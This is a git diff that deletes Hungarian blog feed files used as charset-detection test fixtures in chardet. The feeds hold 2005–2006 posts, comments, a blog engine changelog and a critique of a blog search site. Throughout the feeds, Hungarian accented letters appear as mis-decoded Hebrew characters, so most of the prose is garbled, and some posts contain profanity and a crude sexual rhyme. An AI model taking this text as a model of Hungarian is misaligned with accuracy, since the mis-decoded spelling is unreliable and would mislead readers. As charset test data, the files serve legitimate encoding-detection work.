(Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4333 - <b>Haszprus:</b> tenyleg nem erre talaltak, ki, de akkor maradjon a masik 2 erveles :) <br /> <br /> <q>gondolom תgy hogy יrteslni lehessen arrףl ha indul egy תj blog pl. web2.0 kulcsszףval...</q> &ndash; cinikus megjegyzesek rulz, egyebkent tenyleg valahogy ugy gondoltam, mint a pubsubnal, csak itt mondjuk realtime mehetne a moka. <br /> <br /> lampaval kapcsolatban ha meg tudod oldani autoval, Dunakeszin tudom ajanlani az Eglo Lux nevu eleg nagy lampaaruhazat, eleg nagy a valasztek. <br /> <br /> <b>smv:</b> a kulon oldal tartalmazhatna alapveto adatokat a szajtrol (url, kulcsszavak, kontakt-ember mailcime, ertekeles, akar csillagos modszerrel, kommentek, az utolso x post szovege vagy cimei, esetleg logo az oldalhoz vagy hetente frissulo screenshot (ez le is maradt a listabol)) <br /> <br /> a google reklamokkal kapcsolatban te tudod, de szerintem egy nagyobb harom-, esetleg egy kisebb negyszamjegyu osszegen kivul sokra ne szamits. - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4333 - Wed, 04 Jan 2006 11:25:34 +0100 - - - Balבzs, ma, 11:20 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4332 - Hamarosan, suexID, hamarosan. Pillanatnyilag hבrom fronton harcolok, ha םgy folytatom, ebbץl bloggervilבghבborת lesz :D - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4332 - Wed, 04 Jan 2006 11:20:44 +0100 - - - suexID, ma, 11:17 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4331 - Balבzs: םrhatnבl errץl is a blogodba! :D - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4331 - Wed, 04 Jan 2006 11:17:13 +0100 - - - Haszprus, ma, 11:04 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4330 - nem lesz az olyan rצvid idץ, ma hajnalban asztali lבmpבt kerestem magamnak a neten a lap.hu-rףl kiindulva יs kb. 100 cיg oldalבn rבgtam בt magam, egyik nagyobb hבnyבs volt mint a mבsik (animבlt nyelvvבlasztף zבszlףs kategףria 1-2 kivיtellel). - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4330 - Wed, 04 Jan 2006 11:04:02 +0100 - - - Balבzs, ma, 10:48 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4329 - ֹn azt nem יrtem, hogy lehet egyבltalבn bבrmit is tבblבzatos dizבjnnal megcsinבlni. Egyszeren kיptelen vagyok rב. smv, ha egy 16 יves otthon lץ fiתcska vagy, akkor elיg sok idץd van (tudom, hiszen יn is voltam 16 יves), tanuld meg a <acronym title="Cascading Style Sheet">CSS</acronym>-t. Ha csak tבblבzatolבsra vagy kיpes, akkor rצvid idץn bell kצrbe fog rצhצgni mindenki. - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4329 - Wed, 04 Jan 2006 10:48:15 +0100 - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mr.xml b/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mr.xml deleted file mode 100644 index 6ae0f0f..0000000 --- a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mr.xml +++ /dev/null @@ -1,68 +0,0 @@ - - - - - sHaMaLt bLOG - Ajבnlף - http://shamalt.uw.hu/index.php - 5 vיletlenszer bejegyzיs - hu - Nox v2.2 - Copyright 2003-2006, sHaMaLt - shamalt@shamalt.tk (sHaMaLt) - - http://shamalt.uw.hu/pic/rss_wap_blog.gif - sHaMaLt bLOG - http://shamalt.uw.hu/index.php - - 5 - http://blogs.law.harvard.edu/tech/rss - - Helyzet - http://shamalt.uw.hu/index.php?d=242/helyzet - Be vagyok havazva צcsיm, mint a palatetץ decemberben. - blog - http://shamalt.uw.hu/index.php?d=242/helyzet#hozzaszolasok - http://shamalt.uw.hu/index.php?d=242/helyzet - Mon, 04 Apr 2005 14:13:00 +0200 - - - Referendum - http://shamalt.uw.hu/index.php?d=59/referendum - Tessיk hozzבszףlni itt lentebb abban a kיrdיskצrben, hogy kellene-e olyan gיp, amivel lehet itt jobboldalon mindenfיle hozzבszףlבst eszkצzצlni, vagy felesleges, mert itt van a kommentlehetץsיg/amתgy se szףl hozzב senki? ֹrthetץ voltam? (Szףval legyen oldalt zenץfal, ami kvבzi csetkיnt foghatף fel?) - blog - http://shamalt.uw.hu/index.php?d=59/referendum#hozzaszolasok - http://shamalt.uw.hu/index.php?d=59/referendum - Sat, 09 Oct 2004 21:03:00 +0200 - - - A Terror Hבza - http://shamalt.uw.hu/index.php?d=386/a-terror-haza - Voltam ma a Terror Hבzבban. Most nem akarnיk itt hosszasan vיlemיnyt nyilvבnםtani, de szerintem mindenki menjen el egyszer, mert יrdemes. (<a href="http://www.terrorhaza.hu">http://www.terrorhaza.hu</a>) - kultתra - http://shamalt.uw.hu/index.php?d=386/a-terror-haza#hozzaszolasok - http://shamalt.uw.hu/index.php?d=386/a-terror-haza - Fri, 07 Nov 2003 19:54:00 +0100 - - - gyintיzיs, plבza, Tesco - http://shamalt.uw.hu/index.php?d=338/ugyintezes-plaza-tesco - Zsםr. Voltam ma elintיzni egyetemi dolgokat, erkצlcsi bizonyםtvבny, gףlyatבbor, stbstb., meg csinבltattam bankkבrtyבt, 10 nap mתlva kיsz, zsי.</p><p>Ja meg bazzeg, elmentem a Pףlusba, megtekintettem a Media Marktot. Volt vmi F1 Challenge 99-02 jבtיk, ott volt 2 felיpםtett versenyautף, be lehetett lni, szal toltam pבr kצrt, nem is nיztek sokan hlyיnek, mondjuk elיggי meleg volt azיrt, hogy םgy odagyltek kצrיm az emberek, mondjuk ez biztos csak a Sumakkert porbaalבzף vezetיsi technikבmnak volt kצszצnhetץ. Elיggי jף volt a game, szal asszem mindjבrt le is kapom valahonnan. Megnיztem a billentyzeteket is, hבt ilyen 18ezer ft+fa vmi microsoftos szar, kell a fasznak se. ֱtmentem Office Depotba, יs ott vettem inkבbb keyboardot. Ez mבr nem az a 2ezer forintos kategףria, 3780 ft volt, bizony. :D De annak ellenיre kurva jף, Samsung Internet Keyboard, pont az ilyen lustבknak talבltבk ki, mint יn.</p><p>Hazafelי megint befigyelt Tesco feeling, megint szיlsebes pיnztבrnץkkel, megarulez. Love Tesco. Reklבm. - blog - http://shamalt.uw.hu/index.php?d=338/ugyintezes-plaza-tesco#hozzaszolasok - http://shamalt.uw.hu/index.php?d=338/ugyintezes-plaza-tesco - Mon, 11 Aug 2003 17:19:00 +0200 - - - ATOM - http://shamalt.uw.hu/index.php?d=169/atom - Az <acronym title="Really Simple Syndication">RSS</acronym> mellי lett ATOM feed is, mert unatkoztam. Mיg nincs neki gomb, mert a rיgieket is kicsit בt fogom alakםtani, de a Firefox live bookmarkjבnבl pיldבul lבtszik. Egyיbkיnt pedig: <a href="/atom/">bejegyzיsek</a>, <a href="/atom/?m=k">hozzבszףlבsok</a>, <a href="/atom/?m=s">spבjz</a>. - blogmotor - http://shamalt.uw.hu/index.php?d=169/atom#hozzaszolasok - http://shamalt.uw.hu/index.php?d=169/atom - Tue, 21 Dec 2004 14:30:00 +0100 - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mv.xml b/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mv.xml deleted file mode 100644 index 9d9800b..0000000 --- a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mv.xml +++ /dev/null @@ -1,163 +0,0 @@ - - - - - sHaMaLt bLOG - Verziףtצrtיnet - http://shamalt.uw.hu/index.php - Verziףtצrtיnet - hu - Nox v2.2 - Copyright 2003-2006, sHaMaLt - shamalt@shamalt.tk (sHaMaLt) - - http://shamalt.uw.hu/pic/rss_wap_blog.gif - sHaMaLt bLOG - http://shamalt.uw.hu/index.php - - 5 - http://blogs.law.harvard.edu/tech/rss - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_54 - <acronym title="HyperText Markup Language">HTML</acronym> elemek יs bejegyzיscםm a komment <acronym title="Really Simple Syndication">RSS</acronym>-ben. - http://shamalt.uw.hu/index.php?v#vh_54 - Sun, 25 Dec 2005 00:00:00 +0100 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_53 - A hozzבszףlבs gomb disabled-dי vבlik megnyomבs utבn. (Problיmבkat okozott, kiiktatva.) - http://shamalt.uw.hu/index.php?v#vh_53 - Thu, 03 Nov 2005 00:00:00 +0100 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_52 - Rצvid cםm a bejegyzיs-linkeknיl. - http://shamalt.uw.hu/index.php?v#vh_52 - Sat, 29 Oct 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_51 - Idץgיp. (Az aktuבlis dבtumhoz kיpest 1 vagy 2 יvvel, illetve egy hףnappal rיgebben keletkezett bejegyzיs.) - http://shamalt.uw.hu/index.php?v#vh_51 - Fri, 28 Oct 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_50 - Sitemap יs gyorsםtבsok a kףdon. - http://shamalt.uw.hu/index.php?v#vh_50 - Sun, 23 Oct 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_49 - Idץrend szerinti vagy fordםtott rendezיsi lehetץsיg, illetve permalink a hozzבszףlבsoknבl, valamint directory tag hozzבadבsa a kategףriבknבl. - http://shamalt.uw.hu/index.php?v#vh_49 - Fri, 14 Oct 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_48 - Tagek (category tag, bookmark) hozzבadבsa, יs nיmi bugfix a hozzבszףlבsoknבl (a JavaScriptes linkeket nem alakםtja בt). - http://shamalt.uw.hu/index.php?v#vh_48 - Sun, 02 Oct 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_47 - Felesleges <acronym title="Structured Query Language">SQL</acronym> queryk kigyomlבlבsa, gyorsabb motor. - http://shamalt.uw.hu/index.php?v#vh_47 - Sun, 02 Oct 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_46 - Havi nיzet helyett mindig a legתjabb x bejegyzיs megjelenםtיse a fץoldalon, lapozבssal. - http://shamalt.uw.hu/index.php?v#vh_46 - Sat, 01 Oct 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_45 - A kommentelיsnיl mבr hasznבlhatףk bizonyos <acronym title="HyperText Markup Language">HTML</acronym> tagek. - http://shamalt.uw.hu/index.php?v#vh_45 - Fri, 30 Sep 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_44 - Komment archםvum. - http://shamalt.uw.hu/index.php?v#vh_44 - Sat, 24 Sep 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_43 - Acronym kezelיs bug kijavםtva, nיmi gyorsםtבs a kףdon. - http://shamalt.uw.hu/index.php?v#vh_43 - Mon, 19 Sep 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_42 - A hozzבszףlבsoknבl kisebb hibajavםtבsok: a hozzבszףlף <acronym title="Internet Protocol Number">IP</acronym> cםmיt mבr helyesen menti el, illetve kיt hozzבszףlבs kצzצtt mostantףl legalבbb 20 mבsodpercnek el kell telnie. Meg persze spamvיdelem a trackbackhez. - http://shamalt.uw.hu/index.php?v#vh_42 - Mon, 05 Sep 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_41 - Kisebb bugok javםtgatבsa. (Bejegyzיsek, archםvum, kategףriבk יs verziףtצrtיnet megjelenםtיse, <acronym title="Really Simple Syndication">RSS</acronym> autodiscovery, <title> helyes kiםrבsa.) - http://shamalt.uw.hu/index.php?v#vh_41 - Thu, 25 Aug 2005 00:00:00 +0200 - - - 2.2 - http://shamalt.uw.hu/index.php?v#vh_40 - ֱllapot bevezetיse a bejegyzיseknיl (publikבlhatף vagy sem), ehhez kapcsolףdףan pedig a motor בtםrבsa szבmos helyen. - http://shamalt.uw.hu/index.php?v#vh_40 - Tue, 23 Aug 2005 00:00:00 +0200 - - - 2.1 - http://shamalt.uw.hu/index.php?v#vh_39 - j mezץk az <acronym title="Really Simple Syndication">RSS</acronym> feednיl: webMaster, ttl, docs. - http://shamalt.uw.hu/index.php?v#vh_39 - Sun, 21 Aug 2005 00:00:00 +0200 - - - 2.1 - http://shamalt.uw.hu/index.php?v#vh_38 - Aprףbb vבltoztatבsok a motorban a rיgi bejegyzיsek miatt, illetve rendezיs id helyett dבtum alapjבn. - http://shamalt.uw.hu/index.php?v#vh_38 - Sun, 14 Aug 2005 00:00:00 +0200 - - - 2.1 - http://shamalt.uw.hu/index.php?v#vh_37 - Hozzבszףlבsok szבma a bejegyzיs cםme mellett a <acronym title="Wireless Application Protocol">WAP</acronym>hoz יs az <acronym title="Really Simple Syndication">RSS</acronym>hez. Persze kikapcsolhatף. - http://shamalt.uw.hu/index.php?v#vh_37 - Sat, 13 Aug 2005 00:00:00 +0200 - - - 2.1 - http://shamalt.uw.hu/index.php?v#vh_36 - Az <acronym title="Really Simple Syndication">RSS</acronym> feed bץvםtיse תj mezץkkel: guid, category, comments. ֹs az elmaradhatatlan bugfixek. - http://shamalt.uw.hu/index.php?v#vh_36 - Thu, 04 Aug 2005 00:00:00 +0200 - - - 2.1 - http://shamalt.uw.hu/index.php?v#vh_35 - Ajבnlף <acronym title="Really Simple Syndication">RSS</acronym> feeddel (צt vיletlenszer bejegyzיs), illetve kisebb bugfixek. - http://shamalt.uw.hu/index.php?v#vh_35 - Sun, 24 Jul 2005 00:00:00 +0200 - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.xml b/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.xml deleted file mode 100644 index 9413339..0000000 --- a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.xml +++ /dev/null @@ -1,113 +0,0 @@ - - - - - sHaMaLt bLOG - http://shamalt.uw.hu/index.php - sHaMaLt bLOGja - hu - Nox v2.2 - Copyright 2003-2006, sHaMaLt - shamalt@shamalt.tk (sHaMaLt) - - http://shamalt.uw.hu/pic/rss_wap_blog.gif - sHaMaLt bLOG - http://shamalt.uw.hu/index.php - - 5 - http://blogs.law.harvard.edu/tech/rss - - Mi lesz? - http://shamalt.uw.hu/index.php?d=662/mi-lesz - </p><blockquote><div><p>Szilveszterkor elkerlhetetlen, hogy obligבt mףdon be ne rתgjunk, ilyenkor ez tצrvיnyszintre emelkedik, mint a bיna hבzibulik szervezיsיnek kצtelessיge. A merev rיszeg בllapot elיrיsekor is fontos azonban, hogy kםnosan gyeljnk a lבtszatra, amikor a karבcsonyi maradיk tojבslikץr צsszeveszik a gyomorban az olcsף pezsgץvel יs a napvilבgra akar jצnni, lerendezni a vitבs kיrdיst.</p></div></blockquote><p>Nem is יrtem, miיrt olvasom יn mיg <a href="http://miles.hu">milest</a>. Van havi kיt post, יs azok is בltalבban hasonlףan szםnvonalasak... - blog - http://shamalt.uw.hu/index.php?d=662/mi-lesz#hozzaszolasok - http://shamalt.uw.hu/index.php?d=662/mi-lesz - Wed, 04 Jan 2006 14:14:00 +0100 - - - Urlx - http://shamalt.uw.hu/index.php?d=661/urlx - <img src="/pic_post/060104_urlx.jpg" alt="Urlx" /></p><p>A szבmos eddig ismert idegen יs hazai linkrצvidםtץs יs linkhosszabbםtףs prףbבlkozבsok mellי csatlakozott egy תj, ezתttal AJAXos kצntצsben: <a href="http://urlx.org">Urlx</a>. Egyszer, gyors, hasznos, a <a href="http://tinyurl.com">tinyurl</a>-t klfצldצn simבn le fogja nyomni. - web 2.0 - http://shamalt.uw.hu/index.php?d=661/urlx#hozzaszolasok - http://shamalt.uw.hu/index.php?d=661/urlx - Wed, 04 Jan 2006 12:31:00 +0100 - - - Typetester - http://shamalt.uw.hu/index.php?d=660/typetester - <img src="/pic_post/060104_typetester.jpg" alt="Typetester" /></p><p>Dizבjnereknek, webmestereknek, webes megoldבsokat nyתjtף, virבgszimbףlummal operבlף webfejlesztץ cיgeknek יs magukat webes fיlisteneknek kיpzelץ Pistikיknek hasznos util lehet a <a href="http://typetester.maratz.com/">Typetester</a>, melynek segםtsיgיvel egy adott szצveget tצbbfיle fonttal יs formבzבssal megjelenםtve hasonlםthatunk צssze a kיpernyץn. Tיnyleg jף. - web 2.0 - http://shamalt.uw.hu/index.php?d=660/typetester#hozzaszolasok - http://shamalt.uw.hu/index.php?d=660/typetester - Wed, 04 Jan 2006 12:22:00 +0100 - - - The Web 2.0 Quiz - http://shamalt.uw.hu/index.php?d=659/the-web-2.0-quiz - <img src="/pic_post/060104_the_web_2.0_quiz.jpg" alt="The Web 2.0 Quiz" /></p><p>10/10, יs <a href="http://blog.f4l.be/web2quiz/index.php">neked</a>? - web 2.0 - http://shamalt.uw.hu/index.php?d=659/the-web-2.0-quiz#hozzaszolasok - http://shamalt.uw.hu/index.php?d=659/the-web-2.0-quiz - Wed, 04 Jan 2006 00:41:00 +0100 - - - Blogsearch.hu - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu - Rיszben sajבt indםttatבsbףl, rיszben pedig kיrיsre elhatבroztam, hogy יpםtץ jelleggel megosztanבm gondolataimat a kיszlgetץ magyar blogkeresץ szolgבltatבsrףl, a <a href="http://blogsearch.hu">Blogsearchrץl</a>.</p><p id="tovabb">Az alapצtlet jף, a blogringen kםvl a magyar blogszcיnבt בtfogףan rendszerezץ hazai szבjt eddig nem lיtezett, az e tיren fennבllף r kitצltיsיre tehבt elviekben alkalmas lehetne a blogsearch – azonban nem a jelenlegi bיta בllapotבban.</p><p>A dizבjnt e helytt nem emlםtve kezdjk ott, hogy komoly, szיleskצr felhasznבlבsra tervezett szבjt esetיben – a kifejezetten adatsorok kצzlיsיre szolgבlףkon kםvl – tבblבzatok hasznבlatבnak nem igazבn van helye, layoutra tehבt tבblבkat nem alkalmazunk, egyrיszt a mיret, mבsrיszt a sebessיg szempontjבbףl, harmadrיszt pedig azיrt, mert a tבblבkat alapvetץen nem erre talבltבk ki.</p><p>A tovבbbiakban – mivel tתlsבgosan hosszתra nyתlף cikket nem szeretnיk םrni – az oldal egyes rיszeivel, illetve funkciףival kapcsolatos צtleteket, javaslatokat szednיm csokorba, vבzlatosan.</p><ul class="vh"><li><b>Fץoldal</b><ul class="bullet"><li>tץs, בtlבthatף, nem tתl bonyolult dizבjn szksיges,</li><li>az elץzץekben elmondottak szerint tableless, szemantikus megvalףsםtבssal (<acronym title="HyperText Markup Language">HTML</acronym> יs <acronym title="Cascading Style Sheet">CSS</acronym>)</li><li>a Google reklבmok nem szerencsיsek, ha kיsץbb hirdetץi יrdeklץdיs mutatkozik az oldal irבnt, akkor תgyis komolyabb hirdetיsi formבk lesznek helyettk</li><li>a legתjabb tagok szekciףban elegendץ lenne a legfrissebb צt blogot megjelenםteni</li></ul></li><li><b>Regisztrבciף</b><ul class="bullet"><li>az egyes input mezץkhצz tartozף hasznבlati utasםtבsok tתlsבgosan hangsתlyosak, בtkerlhetnיnek esetleg tooltip-be</li><li>szksיges lenne az e-mail תtjבn vagy egyיb mףdon tצrtיnץ verifikבciף a visszaיlיsek, spambotok elkerlיsיre (az admin בltali jףvבhagyבs nagyszבmת site esetיn kצrlmיnyes)</li><li>nem lenne rossz az <acronym title="Uniform Resource Locator">URL</acronym>-ek יs az e-mail cםm alaki helyessיgיnek ellenץrzיse, mondjuk egy megfelelץ regulבris kifejezיssel</li><li>a felhasznבlףnיv lיtezיsיt akkor is ellenץrizni kellene, ha az mיg nincs jףvבhagyva az admin בltal</li></ul></li><li><b>Keresיs</b><ul class="bullet"><li>teljesen felesleges tתlbonyolםtani a keresיst a hבrom, rבdiףgombbal kivבlaszthatף feltיtellel, cיlszerbb lenne ezeket egy OR kapcsolattal צsszekצtni</li><li>(nיmi AJAX bvיszkedיst esetleg lehetne alkalmazni)</li><li>a cםm elץtag ugyan minek? ;)</li><li>nem lenne hבtrבny, ha a talבlatoknבl megjelenne az a szצvegkצrnyezet, amelyben az adott keresץkifejezיs elץfordult, az adott keresץszף kiemelיsיvel (opcionבlisan a post URL-jיvel)</li><li><acronym title="Really Simple Syndication">RSS</acronym> feed a talבlatokrףl</li><li>klצn info oldal az egyes blogokrףl, amely tartalmaznב a szבjt lיnyeges adatait</li><li>יrtיkelיsi, kommentelיsi lehetץsיg</li></ul></li></ul><p>A kommentekben jצhetnek a tovבbbi vיlemיnyek, צtletek, javaslatok csץstl. - geek - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#hozzaszolasok - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu - Tue, 03 Jan 2006 23:09:00 +0100 - - - Csak szex יs mבs semmi - http://shamalt.uw.hu/index.php?d=657/csak-szex-es-mas-semmi - <img src="/pic_post/060103_csak_szex_es_mas_semmi.jpg" alt="Csak szex יs mבs semmi" /></p><p>Mיg a vizsga hatבsa alatti, kissי tudatmףdosult בllapotban sikerlt belnצm a mozira – melytץl az olvasott kritikבk יs suexID kollיga <a href="http://lpfan.hu/suexid/20051210/csak-szex-es-mas-semmi/">elץzetes בllבsfoglalבsa</a> alapjבn nem vבrtam tתl sokat.</p><p>Viszont ami engem is meglepett, hogy a film egyבltalבn nem tartozik a mostansבg reneszבnszukat יrץ nיpbutםtף magyar szennymozik kצzי – legalבbbis amennyiben egy בtlagos plבzaribi intelligenciבjבt meghaladף szellemi kvalitבsokkal rendelkeznk, יs בtlבtunk a szitבn, hogy ti. az egיsz mozi egy akkora fricska a mostanבban egyיbkיnt tיnyleg nagy divatnak צrvendץ emanci-karrierista szingli-יletmףdnak, hogy beleremeg a hבz.</p><p>Egyszer kifejezetten szףrakoztatף, adnיk rב egy hatost a tםzbץl. - mozi - http://shamalt.uw.hu/index.php?d=657/csak-szex-es-mas-semmi#hozzaszolasok - http://shamalt.uw.hu/index.php?d=657/csak-szex-es-mas-semmi - Tue, 03 Jan 2006 22:11:00 +0100 - - - Rצviden - http://shamalt.uw.hu/index.php?d=656/roviden - A tegnapi nettף kיt ףra alvבs ellenיre sikerlt egy nיgyesre abszolvבlnom a <acronym title="Polgבri perjog">Pp.</acronym> kollokviumot, יs ez jף.</p><p>A respekt-lista pedig bץvlt kicsit, az יrintettek majd יszreveszik gondolom. :P - blog - http://shamalt.uw.hu/index.php?d=656/roviden#hozzaszolasok - http://shamalt.uw.hu/index.php?d=656/roviden - Tue, 03 Jan 2006 20:26:00 +0100 - - - Bתjjיk - http://shamalt.uw.hu/index.php?d=655/bujjek - E tegnapi, esemesben kapott kis rigmussal szeretnיk mindenkinek boldog תj יvet יs egyיb, ilyenkor szokבsos dolgokat kםvבnni:</p><blockquote><div><p>Itt a Szilveszter, vיge az יvnek,kell a zsםros kocsonya, vצrצsbor a bיlnek.Hopp, itt egy kismalac, rבlיp a kekszre,vedd rב az asszonyt az orבlis szexre!</p></div></blockquote><p>Szףval BֹK. :D - blog - http://shamalt.uw.hu/index.php?d=655/bujjek#hozzaszolasok - http://shamalt.uw.hu/index.php?d=655/bujjek - Sun, 01 Jan 2006 10:39:00 +0100 - - - Cool a verda - http://shamalt.uw.hu/index.php?d=654/cool-a-verda - Nem kellett sokat vבrni, elkיszlt a Pimp my ride hazai koppintבsa is. <i>Cool a verda</i> nיven fut a msor, a hasonlף nev kereskedelmin, Prof. habil. Majoros "Majka" Pיter fץszereplיsיvel. Ne-vet-sי-ges :D - blog - http://shamalt.uw.hu/index.php?d=654/cool-a-verda#hozzaszolasok - http://shamalt.uw.hu/index.php?d=654/cool-a-verda - Thu, 29 Dec 2005 00:11:00 +0100 - - - Kazבnhבz - http://shamalt.uw.hu/index.php?d=653/kazanhaz - Tessיk, december 27-e van, יs nem talבlni ftיsszerelץt a fץvבrosban, mיg az sem vבllalja el a melףt, aki fennhangon hirdeti, hogy nnep- יs munkaszneti napokon is dolgozik. Komolyan, ilyenkor karבcsony tבjבn megbיnul az egיsz orszבg, mindenki tesped.</p><p>ֹn meg lassan יpםtek egy iglut, vagy nyitok egy szaunבt, attףl fggץen, hogy יppen be vagy ki nem lehet kapcsolni a kazבnt. :D - blog - http://shamalt.uw.hu/index.php?d=653/kazanhaz#hozzaszolasok - http://shamalt.uw.hu/index.php?d=653/kazanhaz - Tue, 27 Dec 2005 15:59:00 +0100 - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/ugyanmar.blogspot.com.xml b/chardet/tests/iso-8859-2-hungarian/ugyanmar.blogspot.com.xml deleted file mode 100644 index f795017..0000000 --- a/chardet/tests/iso-8859-2-hungarian/ugyanmar.blogspot.com.xml +++ /dev/null @@ -1,239 +0,0 @@ - - - - - - -Ugyanmar -"Ball ist rund. Spiel dauert 90 Minuten. Soviel ist schon mal klar. Alles andere ist Theorie. - Ball ab!" - -tag:blogger.com,1999:blog-6504251 -2006-01-01T21:07:30Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - --b- - -2006-01-01T22:02:00+01:00 -2006-01-01T21:07:30Z -2006-01-01T21:07:30Z - -tag:blogger.com,1999:blog-6504251.post-113614965046768984 -Tul a kinos beszelgetesen. Mondhatni olyan volt, m... - -
    Tul a kinos beszelgetesen. Mondhatni olyan volt, mint amilyennek elkepzeltem, megerto, jo fej es nyitott, nem nehez eszre vennem, hogy a tenyeren hordoz.
    Engem meg lehet mindenfele negativ jelzovel illetni, hiszen mindenrol en tehetek, hibat hibara halmozok, es egyre tobb embert bantok meg, es sikerul befeketitenem magamat elottuk.
    -
    -false -
    - - - --b- - -2005-12-25T17:54:00+01:00 -2005-12-25T16:55:34Z -2005-12-25T16:55:34Z - -tag:blogger.com,1999:blog-6504251.post-113552973403653194 -ha beםrod a keresőbe, hogy bugyit loptam, akkor is... -ha beםrod a keresőbe, hogy <a href="http://www.google.co.hu/search?q=bugyit+loptam&sourceid=mozilla-search&amp;start=0&start=0&amp;ie=utf-8&oe=utf-8&amp;client=firefox-a&amp;rls=org.mozilla:hu-HU:official">bugyit loptam</a>, akkor is rבm tudsz talבlni. valakinek tegnap sikerlt. remיlem megtalבltad, amit kerestיl. -false - - - - --b- - -2005-12-25T17:35:00+01:00 -2005-12-25T16:51:09Z -2005-12-25T16:51:06Z - -tag:blogger.com,1999:blog-6504251.post-113552946632091978 -Hatalmas, hobanmaszkalas az en logofulu dragammal.... - -
    Hatalmas, hobanmaszkalas az en logofulu dragammal. Joleso faradtsag minden tagomban, melegedes, agyban netezes... szunido filing.
    -
    -false -
    - - - --b- - -2005-12-24T15:43:00+01:00 -2005-12-24T14:47:43Z -2005-12-24T14:47:43Z - -tag:blogger.com,1999:blog-6504251.post-113543566344762070 -Eeees, valaki, aki mostanaban nagyon figyel ram, m... - -
    Eeees, valaki, aki mostanaban nagyon figyel ram, meglepett Kretekkel. Hallgattuk a jellegzetes kretek-kretek hangot, es elveztuk nagyon. Olyanokat mond, ami nagyon jol esik es el is bizonytalanit. Ez is megoldasra var meg.
    -
    -false -
    - - - --b- - -2005-12-24T15:25:00+01:00 -2005-12-24T14:40:18Z -2005-12-24T14:40:18Z - -tag:blogger.com,1999:blog-6504251.post-113543521811702912 -kicsit hirtelen, de ismet karacsony. nosztalgikus,... - -
    kicsit hirtelen, de ismet karacsony. nosztalgikus, analizבlף hangulatu, elgondolkodtato. Mas a felallas, mint egy eve volt, de mit titkoljam, az meg akkor is jobban tetszett, ha tudtam, nem sok jovoje lesz. Ennek meg lehetne, megse erzem azt a bizsergest.
    Masmilyet persze igen, es nem is ertem miert a nyavajgas.
    -
    Azert, ha vege a karacsonynak, lesznek יrdekes dolgok. Mar most erzem, hogy lesz egy kinos beszelgetes, aminek a vege ugyis nagy צsszeborulas lesz, meg nemi egymast kerulgetos kerteles, es elegedetlenkedes.
    -
    na bekesboldog
    -
    -false -
    - - - --b- - -2005-12-21T23:18:00+01:00 -2005-12-21T22:18:53Z -2005-12-21T22:18:53Z - -tag:blogger.com,1999:blog-6504251.post-113520353390505519 -7 kredit, karבcsonyra! -kevיs tanulבssal, kis kיrle... - -
    7 kredit, karבcsonyra!
    kevיs tanulבssal, kis kיrlelיssel, csodבscsodבs
    -
    -false -
    - - - --b- - -2005-12-21T21:30:00+01:00 -2005-12-21T20:32:28Z -2005-12-21T20:32:28Z - -tag:blogger.com,1999:blog-6504251.post-113519714871730804 -mבra csak egy olykor feltűnő ablak maradt belőle. -... - -
    mבra csak egy olykor feltűnő ablak maradt belőle.
    -
    aki azt hiszi, mindent tud rףlam, pedig csak olyannak lבt, amilyennek szeretne. יs ez egyre kevיsbי pozitםv, sokkal inkבbb kצzצmbצs.
    -
    -false -
    - - - --b- - -2005-12-19T15:53:00+01:00 -2005-12-19T14:54:53Z -2005-12-19T14:54:53Z - -tag:blogger.com,1999:blog-6504251.post-113500409315975630 -ֹletemben most előszצr elvettיk a dolgozatomat pus... - -
    ֹletemben most előszצr elvettיk a dolgozatomat puskבzבs miatt. (Valףjבban nem puskבztam, csak kiszתrtבk a farzsebemből kikandikבlף kisformבtumתra gyבrtott fיnymבsolt kצnyvecskיt. Amתgy tצk profi volt, kבr, hogy mיg csak nem is hasznבltam.) Majd legkצzelebb.
    -
    -false -
